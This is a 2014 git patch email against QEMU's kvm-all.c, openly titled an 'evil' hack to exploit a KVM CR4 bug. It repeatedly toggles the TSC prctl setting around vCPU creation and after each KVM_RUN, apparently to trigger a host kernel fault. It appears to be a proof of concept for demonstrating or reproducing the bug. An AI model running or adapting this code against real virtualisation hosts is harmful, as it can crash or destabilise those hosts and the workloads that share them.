>From 3689fa9aa528efc759ce9089454d1185d9bf29ae Mon Sep 17 00:00:00 2001
Message-Id: <3689fa9aa528efc759ce9089454d1185d9bf29ae.1412696684.git.luto@amacapital.net>
From: Andy Lutomirski <luto@amacapital.net>
Date: Tue, 7 Oct 2014 08:44:20 -0700
Subject: [PATCH] Evil QEMU hack to exploit a KVM CR4 bug

Save all your work before running a patched QEMU :)
---
 kvm-all.c | 18 +++++++++++++++++-
 1 file changed, 17 insertions(+), 1 deletion(-)

diff --git a/kvm-all.c b/kvm-all.c
index 4afcd0551bb2..2b4d4ace4d15 100644
--- a/kvm-all.c
+++ b/kvm-all.c
@@ -222,13 +222,15 @@ static int kvm_set_user_memory_region(KVMState *s, KVMSlot *slot)
     return kvm_vm_ioctl(s, KVM_SET_USER_MEMORY_REGION, &mem);
 }
 
+#include <sys/prctl.h>
 int kvm_init_vcpu(CPUState *cpu)
 {
     KVMState *s = kvm_state;
     long mmap_size;
     int ret;
 
-    DPRINTF("kvm_init_vcpu\n");
+    if (prctl(PR_SET_TSC, PR_TSC_SIGSEGV, 0, 0, 0) != 0)
+      printf("sad\n");
 
     ret = kvm_vm_ioctl(s, KVM_CREATE_VCPU, (void *)kvm_arch_vcpu_id(cpu));
     if (ret < 0) {
@@ -236,6 +238,11 @@ int kvm_init_vcpu(CPUState *cpu)
         goto err;
     }
 
+    if (prctl(PR_SET_TSC, PR_TSC_ENABLE, 0, 0, 0) != 0)
+      printf("sad\n");
+
+    printf("TSC on\n");
+
     cpu->kvm_fd = ret;
     cpu->kvm_state = s;
     cpu->kvm_vcpu_dirty = true;
@@ -1740,6 +1747,15 @@ int kvm_cpu_exec(CPUState *cpu)
         qemu_mutex_unlock_iothread();
 
         run_ret = kvm_vcpu_ioctl(cpu, KVM_RUN, 0);
+	{
+	  struct timespec ts = {0, 10000000};
+	  nanosleep(&ts, NULL);
+	  if (prctl(PR_SET_TSC, PR_TSC_SIGSEGV, 0, 0, 0) != 0)
+	    printf("sad\n");
+
+	  if (prctl(PR_SET_TSC, PR_TSC_ENABLE, 0, 0, 0) != 0)
+	    printf("sad\n");
+	}
 
         qemu_mutex_lock_iothread();
         kvm_arch_post_run(cpu, run);
-- 
1.9.3